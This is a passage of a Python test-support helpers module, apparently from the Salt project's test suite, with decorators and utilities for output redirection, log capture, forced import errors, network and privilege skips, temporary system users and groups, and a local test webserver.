        self.__redirected = False
        self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)

    def __enter__(self):
        self.redirect()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.unredirect()

    @staticmethod
    def _finalize(stream):
        """Flush and close *stream*, tolerating an already-closed stream."""
        try:
            stream.flush()
            stream.close()
        except ValueError:
            # already closed?
            pass

    @staticmethod
    def _flush_quietly(stream):
        """Flush *stream*, swallowing any error it raises."""
        try:
            stream.flush()
        except Exception:  # pylint: disable=broad-except
            pass

    def redirect(self):
        """Remember and flush the current streams, then install replacements."""
        self.old_stdout = sys.stdout
        self.old_stdout.flush()
        self.old_stderr = sys.stderr
        self.old_stderr.flush()
        self.patcher.start()
        self.__redirected = True

    def unredirect(self):
        """Close the replacement streams and restore the originals."""
        if not self.__redirected:
            return
        self._finalize(self.__stdout)
        self._finalize(self.__stderr)
        self.patcher.stop()

    def flush(self):
        """Flush both replacement streams while redirection is active."""
        if self.__redirected:
            self._flush_quietly(self.__stdout)
            self._flush_quietly(self.__stderr)
class TstSuiteLoggingHandler:
    """
    Simple logging handler which can be used to test if certain logging
    messages get emitted or not:
    .. code-block:: python
        with TstSuiteLoggingHandler() as handler:
            # (...) Do what ever you wish here
            handler.messages  # here are the emitted log messages
    """

    def __init__(self, level=0, format="%(levelname)s:%(message)s"):
        self.level = level
        self.format = format
        self.activated = False
        self.prev_logging_level = None

    def activate(self):
        """Attach a capturing handler to the root logger."""

        class Handler(logging.Handler):
            def __init__(self, level):
                logging.Handler.__init__(self, level)
                self.messages = []

            def emit(self, record):
                self.messages.append(self.format(record))

        self.handler = Handler(self.level)
        self.handler.setFormatter(logging.Formatter(self.format))
        logging.root.addHandler(self.handler)
        self.activated = True
        # Drop the root logger to the lowest level so every record reaches
        # our handler; remember the old level for deactivate() to restore.
        current = logging.root.getEffectiveLevel()
        if current > logging.DEBUG:
            self.prev_logging_level = current
            logging.root.setLevel(0)

    def deactivate(self):
        """Detach the capturing handler and restore the previous level."""
        if not self.activated:
            return
        logging.root.removeHandler(self.handler)
        # Restore previous logging level if changed
        if self.prev_logging_level is not None:
            logging.root.setLevel(self.prev_logging_level)

    @property
    def messages(self):
        return self.handler.messages if self.activated else []

    def clear(self):
        self.handler.messages = []

    def __enter__(self):
        self.activate()
        return self

    def __exit__(self, type, value, traceback):
        self.deactivate()
        self.activated = False

    # Mimic some handler attributes and methods
    @property
    def lock(self):
        return self.handler.lock if self.activated else None

    def createLock(self):
        return self.handler.createLock() if self.activated else None

    def acquire(self):
        return self.handler.acquire() if self.activated else None

    def release(self):
        return self.handler.release() if self.activated else None
class ForceImportErrorOn:
    """
    This class is meant to be used in mock'ed test cases which require an
    ``ImportError`` to be raised.
    >>> import os.path
    >>> with ForceImportErrorOn('os.path'):
    ...     import os.path
    ...
    Traceback (most recent call last):
      File "<stdin>", line 2, in <module>
      File "salttesting/helpers.py", line 263, in __import__
        'Forced ImportError raised for {0!r}'.format(name)
    ImportError: Forced ImportError raised for 'os.path'
    >>>
    >>> with ForceImportErrorOn(('os', 'path')):
    ...     import os.path
    ...     sys.modules.pop('os', None)
    ...     from os import path
    ...
    <module 'os' from '/usr/lib/python2.7/os.pyc'>
    Traceback (most recent call last):
      File "<stdin>", line 4, in <module>
      File "salttesting/helpers.py", line 288, in __fake_import__
        name, ', '.join(fromlist)
    ImportError: Forced ImportError raised for 'from os import path'
    >>>
    >>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
    ...     import os.path
    ...     sys.modules.pop('os', None)
    ...     from os import path
    ...
    Traceback (most recent call last):
      File "<stdin>", line 2, in <module>
      File "salttesting/helpers.py", line 281, in __fake_import__
        'Forced ImportError raised for {0!r}'.format(name)
    ImportError: Forced ImportError raised for 'os.path'
    >>>
    """
    def __init__(self, *module_names):
        # Map of module name -> None (fail ANY import of the module) or a set
        # of attribute names (fail only ``from module import <attr>``).
        self.__module_names = {}
        for entry in module_names:
            if isinstance(entry, (list, tuple)):
                modname = entry[0]
                self.__module_names[modname] = set(entry[1:])
            else:
                self.__module_names[entry] = None
        self.__original_import = builtins.__import__
        self.patcher = patch.object(builtins, "__import__", self.__fake_import__)
    def patch_import_function(self):
        # Globally replace builtins.__import__ with the failing stand-in.
        self.patcher.start()
    def restore_import_funtion(self):
        # NOTE(review): "funtion" typo is part of the public method name;
        # callers use it as-is, so it cannot be renamed here.
        self.patcher.stop()
    def __fake_import__(
        self, name, globals_=None, locals_=None, fromlist=None, level=None
    ):
        # Replacement for builtins.__import__: raise ImportError for the
        # configured modules/attributes, delegate everything else.
        if six.PY2:
            # Python 2's __import__ rejects None for these; normalize.
            if globals_ is None:
                globals_ = {}
            if locals_ is None:
                locals_ = {}
            if level is None:
                level = 0
        if fromlist is None:
            fromlist = []
        if name in self.__module_names:
            importerror_fromlist = self.__module_names.get(name)
            if importerror_fromlist is None:
                raise ImportError("Forced ImportError raised for {!r}".format(name))
            if importerror_fromlist.intersection(set(fromlist)):
                raise ImportError(
                    "Forced ImportError raised for {!r}".format(
                        "from {} import {}".format(name, ", ".join(fromlist))
                    )
                )
        return self.__original_import(name, globals_, locals_, fromlist, level)
    def __enter__(self):
        self.patch_import_function()
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        self.restore_import_funtion()
class MockWraps:
    """
    Helper class to be used with the mock library.

    Use an instance as the ``wraps`` keyword of ``Mock``/``MagicMock`` when a
    side effect should fire for the first N calls, after which every call
    falls through to the original, un-mocked callable. A function side effect
    is invoked and its return value used; any other side effect object is
    raised.
    """

    def __init__(self, original, expected_failures, side_effect):
        self.__original = original
        self.__expected_failures = expected_failures
        self.__side_effect = side_effect
        self.__call_counter = 0

    def __call__(self, *args, **kwargs):
        try:
            if self.__call_counter < self.__expected_failures:
                effect = self.__side_effect
                # Plain functions are invoked; anything else is raised.
                if isinstance(effect, types.FunctionType):
                    return effect()
                raise effect
            return self.__original(*args, **kwargs)
        finally:
            # Every call counts, whether it returned or raised.
            self.__call_counter += 1
def requires_network(only_local_network=False):
    """
    Simple decorator which is supposed to skip a test case in case there's no
    network connection to the internet.
    :param only_local_network: when True, only require a usable local network
        interface (ports 18000/18001 bindable) and skip the internet
        reachability probe.
    """

    def decorator(func):
        @functools.wraps(func)
        def wrapper(cls, *args, **kwargs):
            has_local_network = False
            # First lets try if we have a local network. Inspired in
            # verify_socket
            try:
                pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                pubsock.bind(("", 18000))
                pubsock.close()
                retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                retsock.bind(("", 18001))
                retsock.close()
                has_local_network = True
            except OSError:
                # I wonder if we just have IPV6 support?
                try:
                    pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
                    retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
                    pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                    pubsock.bind(("", 18000))
                    pubsock.close()
                    retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                    retsock.bind(("", 18001))
                    retsock.close()
                    has_local_network = True
                except OSError:
                    # Let's continue
                    pass
            if only_local_network is True:
                if has_local_network is False:
                    # Since we're only supposed to check local network, and no
                    # local network was detected, skip the test
                    cls.skipTest("No local network was detected")
                return func(cls)
            if os.environ.get("NO_INTERNET"):
                cls.skipTest("Environment variable NO_INTERNET is set.")
            # We are using the google.com DNS records as numerical IPs to avoid
            # DNS lookups which could greatly slow down this check
            for addr in (
                "173.194.41.198",
                "173.194.41.199",
                "173.194.41.200",
                "173.194.41.201",
                "173.194.41.206",
                "173.194.41.192",
                "173.194.41.193",
                "173.194.41.194",
                "173.194.41.195",
                "173.194.41.196",
                "173.194.41.197",
            ):
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                try:
                    sock.settimeout(0.25)
                    sock.connect((addr, 80))
                    # We connected? Stop the loop
                    break
                except OSError:
                    # Let's check the next IP
                    continue
                finally:
                    sock.close()
            else:
                # BUG FIX: this skip previously lived on the ``try``
                # statement's ``else`` clause, which never executes because
                # the try body always ends in ``break`` or raises -- so a
                # missing internet connection was never detected. As the
                # ``for`` loop's ``else`` it fires exactly when no address
                # could be reached.
                cls.skipTest("No internet network connection was detected")
            return func(cls, *args, **kwargs)

        return wrapper

    return decorator
def with_system_user(
    username, on_existing="delete", delete=True, password=None, groups=None
):
    """
    Create and optionally destroy a system user to be used within a test
    case. The system user is created using the ``user`` salt module.
    The decorated testcase function must accept 'username' as an argument.
    :param username: The desired username for the system user.
    :param on_existing: What to do when the desired username is taken. The
      available options are:
      * nothing: Do nothing, act as if the user was created.
      * delete: delete and re-create the existing user
      * skip: skip the test case
    :param delete: Remove the user again after the test ran (default True).
    :param password: Optional password to set on the created user.
    :param groups: Optional list of groups for the created user.
    """
    if on_existing not in ("nothing", "delete", "skip"):
        raise RuntimeError(
            "The value of 'on_existing' can only be one of, "
            "'nothing', 'delete' and 'skip'"
        )
    if not isinstance(delete, bool):
        raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug("Creating system user {!r}".format(username))
            kwargs = {"timeout": 60, "groups": groups}
            if salt.utils.platform.is_windows():
                kwargs.update({"password": password})
            create_user = cls.run_function("user.add", [username], **kwargs)
            if not create_user:
                log.debug("Failed to create system user")
                # The user was not created
                if on_existing == "skip":
                    cls.skipTest("Failed to create system user {!r}".format(username))
                if on_existing == "delete":
                    log.debug("Deleting the system user {!r}".format(username))
                    delete_user = cls.run_function(
                        "user.delete", [username, True, True]
                    )
                    if not delete_user:
                        cls.skipTest(
                            "A user named {!r} already existed on the "
                            "system and re-creating it was not possible".format(
                                username
                            )
                        )
                    log.debug("Second time creating system user {!r}".format(username))
                    create_user = cls.run_function("user.add", [username], **kwargs)
                    if not create_user:
                        cls.skipTest(
                            "A user named {!r} already existed, was deleted "
                            "as requested, but re-creating it was not possible".format(
                                username
                            )
                        )
            if not salt.utils.platform.is_windows() and password is not None:
                if salt.utils.platform.is_darwin():
                    hashed_password = password
                else:
                    hashed_password = salt.utils.pycrypto.gen_hash(password=password)
                    hashed_password = "'{}'".format(hashed_password)
                # NOTE(review): the result of setting the password is not
                # checked -- a failed shadow.set_password is silently ignored.
                add_pwd = cls.run_function(
                    "shadow.set_password", [username, hashed_password]
                )
            failure = None
            try:
                try:
                    return func(cls, username)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        "Running {!r} raised an exception: {}".format(func, exc),
                        exc_info=True,
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                if delete:
                    delete_user = cls.run_function(
                        "user.delete", [username, True, True], timeout=60
                    )
                    if not delete_user:
                        if failure is None:
                            log.warning(
                                "Although the actual test-case did not fail, "
                                "deleting the created system user {!r} "
                                "afterwards did.".format(username)
                            )
                        else:
                            log.warning(
                                "The test-case failed and also did the removal"
                                " of the system user {!r}".format(username)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    raise failure[1].with_traceback(failure[2])
        return wrap
    return decorator
def with_system_group(group, on_existing="delete", delete=True):
    """
    Create and optionally destroy a system group to be used within a test
    case. The system group is created using the ``group`` salt module.
    The decorated testcase function must accept 'group' as an argument.
    :param group: The desired group name for the system group.
    :param on_existing: What to do when the desired group name is taken. The
      available options are:
      * nothing: Do nothing, act as if the group was created
      * delete: delete and re-create the existing group
      * skip: skip the test case
    :param delete: Remove the group again after the test ran (default True).
    """
    if on_existing not in ("nothing", "delete", "skip"):
        raise RuntimeError(
            "The value of 'on_existing' can only be one of, "
            "'nothing', 'delete' and 'skip'"
        )
    if not isinstance(delete, bool):
        raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug("Creating system group {!r}".format(group))
            create_group = cls.run_function("group.add", [group])
            if not create_group:
                log.debug("Failed to create system group")
                # The group was not created
                if on_existing == "skip":
                    cls.skipTest("Failed to create system group {!r}".format(group))
                if on_existing == "delete":
                    log.debug("Deleting the system group {!r}".format(group))
                    delete_group = cls.run_function("group.delete", [group])
                    if not delete_group:
                        cls.skipTest(
                            "A group named {!r} already existed on the "
                            "system and re-creating it was not possible".format(group)
                        )
                    log.debug("Second time creating system group {!r}".format(group))
                    create_group = cls.run_function("group.add", [group])
                    if not create_group:
                        cls.skipTest(
                            "A group named {!r} already existed, was deleted "
                            "as requested, but re-creating it was not possible".format(
                                group
                            )
                        )
            failure = None
            try:
                try:
                    return func(cls, group)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        "Running {!r} raised an exception: {}".format(func, exc),
                        exc_info=True,
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                if delete:
                    delete_group = cls.run_function("group.delete", [group])
                    if not delete_group:
                        if failure is None:
                            log.warning(
                                "Although the actual test-case did not fail, "
                                "deleting the created system group {!r} "
                                "afterwards did.".format(group)
                            )
                        else:
                            log.warning(
                                "The test-case failed and also did the removal"
                                " of the system group {!r}".format(group)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    raise failure[1].with_traceback(failure[2])
        return wrap
    return decorator
def with_system_user_and_group(username, group, on_existing="delete", delete=True):
    """
    Create and optionally destroy a system user and group to be used within a
    test case. The system user is created using the ``user`` salt module, and
    the system group is created with the ``group`` salt module.
    The decorated testcase function must accept both the 'username' and 'group'
    arguments.
    :param username: The desired username for the system user.
    :param group: The desired name for the system group.
    :param on_existing: What to do when the desired username is taken. The
      available options are:
      * nothing: Do nothing, act as if the user was created.
      * delete: delete and re-create the existing user
      * skip: skip the test case
    :param delete: Remove the user and group after the test ran (default True).
    """
    if on_existing not in ("nothing", "delete", "skip"):
        raise RuntimeError(
            "The value of 'on_existing' can only be one of, "
            "'nothing', 'delete' and 'skip'"
        )
    if not isinstance(delete, bool):
        raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
    def decorator(func):
        @functools.wraps(func)
        def wrap(cls):
            # Let's add the user to the system.
            log.debug("Creating system user {!r}".format(username))
            create_user = cls.run_function("user.add", [username])
            log.debug("Creating system group {!r}".format(group))
            create_group = cls.run_function("group.add", [group])
            if not create_user:
                log.debug("Failed to create system user")
                # The user was not created
                if on_existing == "skip":
                    cls.skipTest("Failed to create system user {!r}".format(username))
                if on_existing == "delete":
                    log.debug("Deleting the system user {!r}".format(username))
                    delete_user = cls.run_function(
                        "user.delete", [username, True, True]
                    )
                    if not delete_user:
                        cls.skipTest(
                            "A user named {!r} already existed on the "
                            "system and re-creating it was not possible".format(
                                username
                            )
                        )
                    log.debug("Second time creating system user {!r}".format(username))
                    create_user = cls.run_function("user.add", [username])
                    if not create_user:
                        cls.skipTest(
                            "A user named {!r} already existed, was deleted "
                            "as requested, but re-creating it was not possible".format(
                                username
                            )
                        )
            if not create_group:
                log.debug("Failed to create system group")
                # The group was not created
                if on_existing == "skip":
                    cls.skipTest("Failed to create system group {!r}".format(group))
                if on_existing == "delete":
                    log.debug("Deleting the system group {!r}".format(group))
                    delete_group = cls.run_function("group.delete", [group])
                    if not delete_group:
                        cls.skipTest(
                            "A group named {!r} already existed on the "
                            "system and re-creating it was not possible".format(group)
                        )
                    log.debug("Second time creating system group {!r}".format(group))
                    create_group = cls.run_function("group.add", [group])
                    if not create_group:
                        cls.skipTest(
                            "A group named {!r} already existed, was deleted "
                            "as requested, but re-creating it was not possible".format(
                                group
                            )
                        )
            failure = None
            try:
                try:
                    return func(cls, username, group)
                except Exception as exc:  # pylint: disable=W0703
                    log.error(
                        "Running {!r} raised an exception: {}".format(func, exc),
                        exc_info=True,
                    )
                    # Store the original exception details which will be raised
                    # a little further down the code
                    failure = sys.exc_info()
            finally:
                if delete:
                    delete_user = cls.run_function(
                        "user.delete", [username, True, True]
                    )
                    delete_group = cls.run_function("group.delete", [group])
                    if not delete_user:
                        if failure is None:
                            log.warning(
                                "Although the actual test-case did not fail, "
                                "deleting the created system user {!r} "
                                "afterwards did.".format(username)
                            )
                        else:
                            log.warning(
                                "The test-case failed and also did the removal"
                                " of the system user {!r}".format(username)
                            )
                    if not delete_group:
                        if failure is None:
                            log.warning(
                                "Although the actual test-case did not fail, "
                                "deleting the created system group {!r} "
                                "afterwards did.".format(group)
                            )
                        else:
                            log.warning(
                                "The test-case failed and also did the removal"
                                " of the system group {!r}".format(group)
                            )
                if failure is not None:
                    # If an exception was thrown, raise it
                    raise failure[1].with_traceback(failure[2])
        return wrap
    return decorator
class WithTempfile:
    """Decorator that hands the decorated test method a temporary file path.

    The path is inserted right after the ``testcase`` argument and the file
    is removed once the test returns. ``create=False`` yields a path that
    does not exist yet; all other keyword arguments are forwarded to
    ``salt.utils.files.mkstemp`` (``dir`` defaults to ``RUNTIME_VARS.TMP``,
    ``prefix`` to ``"__salt.test."``).
    """

    def __init__(self, **kwargs):
        self.create = kwargs.pop("create", True)
        if "dir" not in kwargs:
            kwargs["dir"] = RUNTIME_VARS.TMP
        if "prefix" not in kwargs:
            kwargs["prefix"] = "__salt.test."
        self.kwargs = kwargs

    def __call__(self, func):
        self.func = func

        @functools.wraps(func)
        def caller(testcase, *args, **kwargs):
            return self.wrap(testcase, *args, **kwargs)

        return caller

    def wrap(self, testcase, *args, **kwargs):
        path = salt.utils.files.mkstemp(**self.kwargs)
        if not self.create:
            os.remove(path)
        try:
            return self.func(testcase, path, *args, **kwargs)
        finally:
            try:
                os.remove(path)
            except OSError:
                # Already gone -- nothing left to clean up.
                pass
with_tempfile = WithTempfile  # decorator-style lowercase alias
class WithTempdir:
    """Decorator that hands the decorated test method a temporary directory.

    The directory path is inserted right after the ``testcase`` argument and
    the tree is deleted once the test returns. ``create=False`` yields a path
    that does not exist yet; all other keyword arguments are forwarded to
    ``tempfile.mkdtemp`` (``dir`` defaults to ``RUNTIME_VARS.TMP``).
    """

    def __init__(self, **kwargs):
        self.create = kwargs.pop("create", True)
        if "dir" not in kwargs:
            kwargs["dir"] = RUNTIME_VARS.TMP
        self.kwargs = kwargs

    def __call__(self, func):
        self.func = func

        @functools.wraps(func)
        def caller(testcase, *args, **kwargs):
            return self.wrap(testcase, *args, **kwargs)

        return caller

    def wrap(self, testcase, *args, **kwargs):
        path = tempfile.mkdtemp(**self.kwargs)
        if not self.create:
            os.rmdir(path)
        try:
            return self.func(testcase, path, *args, **kwargs)
        finally:
            shutil.rmtree(path, ignore_errors=True)
with_tempdir = WithTempdir  # decorator-style lowercase alias
def requires_system_grains(func):
    """
    Function decorator which loads and passes the system's grains to the test
    case.
    The grains are loaded only once, on first use, and cached as an attribute
    of this decorator function; every decorated call then receives them via
    the ``grains`` keyword argument.
    """
    @functools.wraps(func)
    def decorator(*args, **kwargs):
        if not hasattr(requires_system_grains, "__grains__"):
            # Late import
            from tests.support.sminion import build_minion_opts
            opts = build_minion_opts(minion_id="runtests-internal-sminion")
            # NOTE(review): relies on ``salt.loader`` being reachable through
            # the ``salt`` package -- no explicit ``import salt.loader`` is
            # visible in this file; confirm it is imported transitively.
            requires_system_grains.__grains__ = salt.loader.grains(opts)
        kwargs["grains"] = requires_system_grains.__grains__
        return func(*args, **kwargs)
    return decorator
@requires_system_grains
def runs_on(grains=None, **kwargs):
    """
    Skip the test if grains don't match the values passed into **kwargs
    if a kwarg value is a list then skip if the grains don't match any item in the list
    """
    reason = kwargs.pop("reason", None)
    for kw, value in kwargs.items():
        if isinstance(value, list):
            # Skip when the grain matches NONE of the accepted values.
            # (Previously this tested ``!=`` inside any(), which only skipped
            # when the grain matched EVERY listed value -- the inverse of the
            # documented behavior and of not_runs_on().)
            if not any(str(grains.get(kw)).lower() == str(v).lower() for v in value):
                if reason is None:
                    reason = "This test does not run on {}={}".format(
                        kw, grains.get(kw)
                    )
                return skip(reason)
        else:
            if str(grains.get(kw)).lower() != str(value).lower():
                if reason is None:
                    reason = "This test runs on {}={}, not {}".format(
                        kw, value, grains.get(kw)
                    )
                return skip(reason)
    return _id
@requires_system_grains
def not_runs_on(grains=None, **kwargs):
    """
    Reverse of `runs_on`.
    Skip the test if any grains match the values passed into **kwargs
    if a kwarg value is a list then skip if the grains match any item in the list
    """
    reason = kwargs.pop("reason", None)
    for kw, value in kwargs.items():
        grain = str(grains.get(kw)).lower()
        if isinstance(value, list):
            # Any single match against the list is enough to skip.
            if any(grain == str(candidate).lower() for candidate in value):
                if reason is None:
                    reason = "This test does not run on {}={}".format(
                        kw, grains.get(kw)
                    )
                return skip(reason)
        elif grain == str(value).lower():
            if reason is None:
                reason = "This test does not run on {}={}, got {}".format(
                    kw, value, grains.get(kw)
                )
            return skip(reason)
    return _id
def _check_required_sminion_attributes(sminion_attr, *required_items):
    """
    :param sminion_attr: The name of the sminion attribute to check, such as 'functions' or 'states'
    :param required_items: The items that must be part of the designated sminion attribute for the decorated test
    :return The packages that are not available
    """
    # Late import
    from tests.support.sminion import create_sminion

    remaining = set(required_items)
    sminion = create_sminion(minion_id="runtests-internal-sminion")
    available = list(getattr(sminion, sminion_attr))

    # Cache of names already known to be missing, stored on the sminion so
    # repeated checks do not re-scan the loader.
    cache_attr = "__not_available_{items}s__".format(items=sminion_attr)
    if not hasattr(sminion, cache_attr):
        setattr(sminion, cache_attr, set())
    known_missing = getattr(sminion, cache_attr)

    missing = set()
    for cached_item in known_missing:
        if cached_item in remaining:
            missing.add(cached_item)
            remaining.remove(cached_item)

    for item in remaining:
        # Bare module names match any of their functions/states.
        pattern = item if "." in item else item + ".*"
        if not fnmatch.filter(available, pattern):
            missing.add(item)
            known_missing.add(item)
    return missing
def requires_salt_states(*names):
    """
    Makes sure the passed salt state is available. Skips the test if not

    .. versionadded:: 3000
    """
    not_available = _check_required_sminion_attributes("states", *names)
    if not_available:
        # Join every missing name; the previous ``format(*not_available)``
        # silently dropped all but the first item of the set.
        return skip("Unavailable salt states: {}".format(", ".join(not_available)))
    return _id
def requires_salt_modules(*names):
    """
    Makes sure the passed salt module is available. Skips the test if not

    .. versionadded:: 0.5.2
    """
    not_available = _check_required_sminion_attributes("functions", *names)
    if not_available:
        # Join every missing name; the previous ``format(*not_available)``
        # silently dropped all but the first item of the set.
        return skip("Unavailable salt modules: {}".format(", ".join(not_available)))
    return _id
def skip_if_binaries_missing(*binaries, **kwargs):
    """Skip the test when required system binaries cannot be found.

    By default the test is skipped only when *none* of the binaries exist;
    pass ``check_all=True`` to require every binary. An optional ``message``
    keyword is prefixed to the skip reason.
    """
    import salt.utils.path

    if len(binaries) == 1 and isinstance(binaries[0], (list, tuple, set, frozenset)):
        binaries = binaries[0]
    check_all = kwargs.pop("check_all", False)
    message = kwargs.pop("message", None)
    if kwargs:
        raise RuntimeError(
            "The only supported keyword argument is 'check_all' and "
            "'message'. Invalid keyword arguments: {}".format(", ".join(kwargs.keys()))
        )
    prefix = message and "{}. ".format(message) or ""
    if check_all:
        # Every binary must be present.
        for binary in binaries:
            if salt.utils.path.which(binary) is None:
                return skip("{}The {!r} binary was not found".format(prefix, binary))
    elif salt.utils.path.which_bin(binaries) is None:
        # At least one of the binaries must be present.
        return skip(
            "{}None of the following binaries was found: {}".format(
                prefix, ", ".join(binaries)
            )
        )
    return _id
def skip_if_not_root(func):
    """Mark ``func`` to be skipped unless running with elevated privileges.

    On POSIX the effective user must be root; on Windows the current user
    must be SYSTEM or an Administrator.
    """
    setattr(func, "__skip_if_not_root__", True)
    if sys.platform.startswith("win"):
        current_user = salt.utils.win_functions.get_current_user()
        # SYSTEM is implicitly privileged; anyone else must be an admin.
        if current_user != "SYSTEM" and not salt.utils.win_functions.is_admin(
            current_user
        ):
            func.__unittest_skip__ = True
            func.__unittest_skip_why__ = (
                "You must be logged in as an Administrator to run this test"
            )
    elif os.getuid() != 0:
        func.__unittest_skip__ = True
        func.__unittest_skip_why__ = "You must be logged in as root to run this test"
    return func
def repeat(caller=None, condition=True, times=5):
    """
    Repeat a test X amount of times until the first failure.

    .. code-block:: python

        class MyTestCase(TestCase):

            @repeat
            def test_sometimes_works(self):
                pass
    """
    if caller is None:
        # Called with arguments: ``@repeat(times=10)``.
        return functools.partial(repeat, condition=condition, times=times)

    if isinstance(condition, bool) and condition is False:
        # Don't even decorate
        return caller
    elif callable(condition):
        if condition() is False:
            # Don't even decorate
            return caller

    if inspect.isclass(caller):
        # Decorating a class: recursively wrap every ``test_*`` method.
        attrs = [n for n in dir(caller) if n.startswith("test_")]
        for attrname in attrs:
            try:
                function = getattr(caller, attrname)
                if not inspect.isfunction(function) and not inspect.ismethod(function):
                    continue
                setattr(
                    caller,
                    attrname,
                    repeat(caller=function, condition=condition, times=times),
                )
            except Exception as exc:  # pylint: disable=broad-except
                log.exception(exc)
                continue
        return caller

    @functools.wraps(caller)
    def wrap(cls):
        # Run the test ``times`` times; the first failure propagates.
        # (An unused ``result`` accumulator was removed.)
        for attempt in range(1, times + 1):
            log.info("%s test run %d of %s times", cls, attempt, times)
            caller(cls)
        return cls

    return wrap
def http_basic_auth(login_cb=lambda username, password: False):
    """
    A crude decorator to force a handler to request HTTP Basic Authentication

    Example usage:

    .. code-block:: python

        @http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
        class AuthenticatedHandler(salt.ext.tornado.web.RequestHandler):
            pass
    """

    def wrapper(handler_class):
        def wrap_execute(handler_execute):
            def check_auth(handler, kwargs):
                auth = handler.request.headers.get("Authorization")

                if auth is None or not auth.startswith("Basic "):
                    # No username/password entered yet, we need to return a 401
                    # and set the WWW-Authenticate header to request login.
                    handler.set_status(401)
                    handler.set_header("WWW-Authenticate", "Basic realm=Restricted")
                else:
                    # Strip the 'Basic ' from the beginning of the auth header
                    # leaving the base64-encoded secret.
                    # b64decode returns bytes on Python 3 -- decode before
                    # splitting, otherwise str/bytes mixing raises TypeError.
                    username, password = (
                        base64.b64decode(auth[6:]).decode("utf-8").split(":", 1)
                    )

                    if login_cb(username, password):
                        # Authentication successful
                        return
                    else:
                        # Authentication failed
                        handler.set_status(403)
                # Either no credentials (401) or bad credentials (403):
                # finish the response immediately.
                handler._transforms = []
                handler.finish()

            def _execute(self, transforms, *args, **kwargs):
                check_auth(self, kwargs)
                return handler_execute(self, transforms, *args, **kwargs)

            return _execute

        handler_class._execute = wrap_execute(handler_class._execute)
        return handler_class

    return wrapper
def generate_random_name(prefix, size=6):
    """
    Generates a random name by combining the provided prefix with a randomly generated
    ascii string.

    .. versionadded:: 2018.3.0

    prefix
        The string to prefix onto the randomly generated ascii string.

    size
        The number of characters to generate. Default: 6.
    """
    # Deprecated shim: warn, then delegate to ``random_string`` with the
    # equivalent arguments (no lowercase letters, matching old behavior).
    salt.utils.versions.warn_until_date(
        "20220101",
        "Please replace your call 'generate_random_name({0})' with 'random_string({0}, lowercase=False)' as "
        "'generate_random_name' will be removed after {{date}}".format(prefix),
    )
    return random_string(prefix, size=size, lowercase=False)
def random_string(prefix, size=6, uppercase=True, lowercase=True, digits=True):
    """
    Generates a random string.

    ..versionadded: 3001

    Args:
        prefix(str): The prefix for the random string
        size(int): The size of the random string
        uppercase(bool): If true, include uppercased ascii chars in choice sample
        lowercase(bool): If true, include lowercased ascii chars in choice sample
        digits(bool): If true, include digits in choice sample
    Returns:
        str: The random string
    """
    if not (uppercase or lowercase or digits):
        raise RuntimeError(
            "At least one of 'uppercase', 'lowercase' or 'digits' needs to be true"
        )
    # Build the sample pool from the enabled character classes.
    pool = ""
    if uppercase:
        pool += string.ascii_uppercase
    if lowercase:
        pool += string.ascii_lowercase
    if digits:
        pool += string.digits
    suffix = "".join(random.choice(pool) for _ in range(size))
    return prefix + suffix
class Webserver:
    """
    Starts a tornado webserver on 127.0.0.1 on a random available port

    USAGE:

    .. code-block:: python

        from tests.support.helpers import Webserver

        webserver = Webserver('/path/to/web/root')
        webserver.start()
        webserver.stop()
    """

    def __init__(self, root=None, port=None, wait=5, handler=None, ssl_opts=None):
        """
        root
            Root directory of webserver. If not passed, it will default to the
            location of the base environment of the integration suite's file
            roots (tests/integration/files/file/base/)

        port
            Port on which to listen. If not passed, a random one will be chosen
            at the time the start() function is invoked.

        wait : 5
            Number of seconds to wait for the socket to be open before raising
            an exception

        handler
            Can be used to use a subclass of tornado.web.StaticFileHandler,
            such as when enforcing authentication with the http_basic_auth
            decorator.
        """
        if port is not None and not isinstance(port, int):
            raise ValueError("port must be an integer")

        if root is None:
            root = RUNTIME_VARS.BASE_FILES
        try:
            self.root = os.path.realpath(root)
        except AttributeError:
            raise ValueError("root must be a string")

        self.port = port
        self.wait = wait
        self.handler = (
            handler if handler is not None else salt.ext.tornado.web.StaticFileHandler
        )
        self.web_root = None
        self.ssl_opts = ssl_opts

    def target(self):
        """
        Threading target which stands up the tornado application
        """
        self.ioloop = salt.ext.tornado.ioloop.IOLoop()
        self.ioloop.make_current()
        # StaticFileHandler needs the document root; custom handlers get
        # no extra init kwargs.
        if self.handler == salt.ext.tornado.web.StaticFileHandler:
            self.application = salt.ext.tornado.web.Application(
                [(r"/(.*)", self.handler, {"path": self.root})]
            )
        else:
            self.application = salt.ext.tornado.web.Application(
                [(r"/(.*)", self.handler)]
            )
        self.application.listen(self.port, ssl_options=self.ssl_opts)
        self.ioloop.start()

    @property
    def listening(self):
        """Whether something is accepting connections on ``self.port``."""
        if self.port is None:
            return False
        # Close the probe socket; the previous implementation leaked one
        # socket per poll of this property.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            return sock.connect_ex(("127.0.0.1", self.port)) == 0
        finally:
            sock.close()

